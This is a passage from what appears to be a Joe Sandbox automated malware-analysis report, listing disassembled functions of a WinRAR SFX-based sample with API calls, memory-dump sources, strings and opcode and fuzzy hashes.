                                      • Instruction Fuzzy Hash: 1D41F671A00219ABDB209F68DC4ABAEBFA8FF45710F104239F905E76D1D734A944C7A4
                                      Function 00512AFA Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00512B16
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00512B2F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 2888e7f7cc4ac50b6090551960dfca2b452822de5eadf379e22d3932c2af01ac
                                      • Instruction ID: 78fcdc0e709999ad5f6aa0124f6f3500467a608afb5b6dbba14ed42833e9a332
                                      • Opcode Fuzzy Hash: 2888e7f7cc4ac50b6090551960dfca2b452822de5eadf379e22d3932c2af01ac
                                      • Instruction Fuzzy Hash: 7301DF3220C3126EF7342A747C9A9EA2F59FFA27B4F600B3AF110550E0EF114C96A244
                                      Function 0050DC3B Relevance: 6.0, APIs: 4, Instructions: 42windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050DC61
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050DC72
                                      • TranslateMessage.USER32(?), ref: 0050DC7C
                                      • DispatchMessageW.USER32(?), ref: 0050DC86
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 4217535847-0
                                      • Opcode ID: da266163829122e8f114b0f718d762b0dfe46150dbf942e296fcea4f464c1bc0
                                      • Instruction ID: 0d3cf4fbce7f62439dd99ced7bd296d058bb39799dd130fb3c87f237d7a36ce3
                                      • Opcode Fuzzy Hash: da266163829122e8f114b0f718d762b0dfe46150dbf942e296fcea4f464c1bc0
                                      • Instruction Fuzzy Hash: F5F03C72A01319BBCB206BA5DC4CDCF7F7DFF52792B004421B50AD20A0D674864ADBB0
                                      Function 00501FDD Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID:
                                      • API String ID: 176396367-0
                                      • Opcode ID: a865a7623218500f83b7374edd7041d3d8e496fef7af9903a623ab5f110ddc64
                                      • Instruction ID: dc8ff83925d23af7ea5180ecd34eab6dda41c57ec558f4d5f0947bc5bdf820b5
                                      • Opcode Fuzzy Hash: a865a7623218500f83b7374edd7041d3d8e496fef7af9903a623ab5f110ddc64
                                      • Instruction Fuzzy Hash: DFF06D32008214BBDF221F51EC0DDCE3F2AFB80760F118405F61A5E0A1CB7296A1D690
                                      Function 0050A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0050A666
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0050A675
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0050A683
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0050A691
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: e91901a931ab2eac8be4715296e819104f764f61fa6f3f3f9e4a17e88fcf3378
                                      • Instruction ID: b8b40efad7369eaf427139cac2d042ebdbe1860a073e3298969b4e64ff99289e
                                      • Opcode Fuzzy Hash: e91901a931ab2eac8be4715296e819104f764f61fa6f3f3f9e4a17e88fcf3378
                                      • Instruction Fuzzy Hash: 6CE01D31952721B7D7515B607C1DB9B3E54AB25B93F010101F609951F0DB7487089B91
                                      Function 0050D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: .lnk$dP
                                      • API String ID: 2691759472-3456662748
                                      • Opcode ID: 61f896858087c115f43d6c24b7e2a17693bf508704fd7b0ece492e0b111d3475
                                      • Instruction ID: 6cac1d9d86ae12b00f9a449be385f63441eebe509da61258517f4ec24866f0d2
                                      • Opcode Fuzzy Hash: 61f896858087c115f43d6c24b7e2a17693bf508704fd7b0ece492e0b111d3475
                                      • Instruction Fuzzy Hash: 5DA1517690022A96DF24DBA0DD49EFF77FCAF44304F0885A6B509E7181EE359B848B71
                                      Function 0051B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID: *?$.
                                      • API String ID: 269201875-3972193922
                                      • Opcode ID: a43f323726f3add9ee6ade21ba1b60dabe11b9fdc077469e3faaf2e020bb5495
                                      • Instruction ID: 6a670fa4a886848874bb5fd046acd3c4ba6d96324d045bf152eab36ad8caeaf2
                                      • Opcode Fuzzy Hash: a43f323726f3add9ee6ade21ba1b60dabe11b9fdc077469e3faaf2e020bb5495
                                      • Instruction Fuzzy Hash: 95517D75E0020AAFEF14DFA8C885AEDBBB5FF98310F244169E854E7340E7359A45CB50
                                      Function 004F9382 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F9387
                                        • Part of subcall function 004FC29A: _wcslen.LIBCMT ref: 004FC2A2
                                      • _swprintf.LIBCMT ref: 004F9465
                                        • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog__vswprintf_c_l_swprintf_wcslen
                                      • String ID: rtmp%d
                                      • API String ID: 1262143012-3303766350
                                      • Opcode ID: ed65ed2d9ca9803944de3c68cef32c05b82d772af930fbc7453700823f8a3aa4
                                      • Instruction ID: 5205fbd5e319209d9c18bd5c89ae157bd3839676b37b990c11a95b248c01136e
                                      • Opcode Fuzzy Hash: ed65ed2d9ca9803944de3c68cef32c05b82d772af930fbc7453700823f8a3aa4
                                      • Instruction Fuzzy Hash: EE41727290026D75DF21ABA18D55EFF737CAF51344F0048AAB709E3151DA3C8F899B68
                                      Function 004FB37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: *
                                      • API String ID: 2691759472-163128923
                                      • Opcode ID: 46d95009d91d29d2ddc773a7241a23004416e887b760c7d01bf6cd1b03786c58
                                      • Instruction ID: f05cdf8e994ed672d0f7ff0ffe2cdb9da1bac955cba1aa1f0b59366d49edd9ca
                                      • Opcode Fuzzy Hash: 46d95009d91d29d2ddc773a7241a23004416e887b760c7d01bf6cd1b03786c58
                                      • Instruction Fuzzy Hash: DF3116261443199A9A30AE14CB0267B73E9DF93B14F14851FFF8447283E72D8C8292EA
                                      Function 005131D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _abort
                                      • String ID: MOC$RCC
                                      • API String ID: 1888311480-2084237596
                                      • Opcode ID: 2f2bcd6d75f1967af082b14dac1dd4ed3b1b4902f9513178159c06be971677a7
                                      • Instruction ID: c9ac8ca6e3a172d8dbce7486bbcc14d48882cc6406f41e494dc074ae95da71c9
                                      • Opcode Fuzzy Hash: 2f2bcd6d75f1967af082b14dac1dd4ed3b1b4902f9513178159c06be971677a7
                                      • Instruction Fuzzy Hash: F3416875900209AFEF15DF98CC81AEEBFB5BF48304F188099F914A7251D335EAA0DB54
                                      Function 004F7401 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F7406
                                        • Part of subcall function 004F3BBA: __EH_prolog.LIBCMT ref: 004F3BBF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 3519838083-639343689
                                      • Opcode ID: f548f04a21d7df1741db6f49b95d51cb7e77435d985423e245a03c9652237f6c
                                      • Instruction ID: a134b083ec6a5acf6764a36f9bd855a9eb18b40a1cbbbeb03161de0208900473
                                      • Opcode Fuzzy Hash: f548f04a21d7df1741db6f49b95d51cb7e77435d985423e245a03c9652237f6c
                                      • Instruction Fuzzy Hash: 9831EE71D0025DAADF11ABA4DC49BFF7BA8AF19304F04401AF604A7292D77C9A488B68
                                      Function 0050B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: }
                                      • API String ID: 176396367-4239843852
                                      • Opcode ID: 05353b6de600615f70b683666c68fbe3aeff3f98de3aceb71aef4052b121c560
                                      • Instruction ID: 73e09a38574f3842b992b1152f7184232495394b2f7d94e7b0a0b13c37d2a78e
                                      • Opcode Fuzzy Hash: 05353b6de600615f70b683666c68fbe3aeff3f98de3aceb71aef4052b121c560
                                      • Instruction Fuzzy Hash: CC2107725043065AE730DA64DC89E6EBBDCFF81710F04082AF540C3181F7659E8883A2
                                      Function 0050DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: Software\WinRAR SFX$P
                                      • API String ID: 176396367-3520587227
                                      • Opcode ID: 992baf9a0e3274cf5534965355b67a30ad015514fabe1010ae44a453dfd2ba1f
                                      • Instruction ID: a7ec87e9d4b4d1e941b0e007d7d0d2f57062ddd757d6832b438aa3b671b9c3a7
                                      • Opcode Fuzzy Hash: 992baf9a0e3274cf5534965355b67a30ad015514fabe1010ae44a453dfd2ba1f
                                      • Instruction Fuzzy Hash: E7012871900228BAEF229B95DC0EFDF7F7CFB55791F000052B549A10E1E7B19A98DAA1
                                      Function 0050AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004FC29A: _wcslen.LIBCMT ref: 004FC2A2
                                        • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00501FE5
                                        • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00501FF6
                                        • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00502006
                                        • Part of subcall function 00501FDD: _wcslen.LIBCMT ref: 00502014
                                        • Part of subcall function 0050AC04: SetCurrentDirectoryW.KERNELBASE(?), ref: 0050AC08
                                      • _wcslen.LIBCMT ref: 0050AE8B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen$CurrentDirectory
                                      • String ID: <P$C:\Users\user\Desktop
                                      • API String ID: 3341907918-3234860373
                                      • Opcode ID: 2bdec9bc548bbb8889deb3edc815bf64c2400c991d6d43f03b18f0610508369e
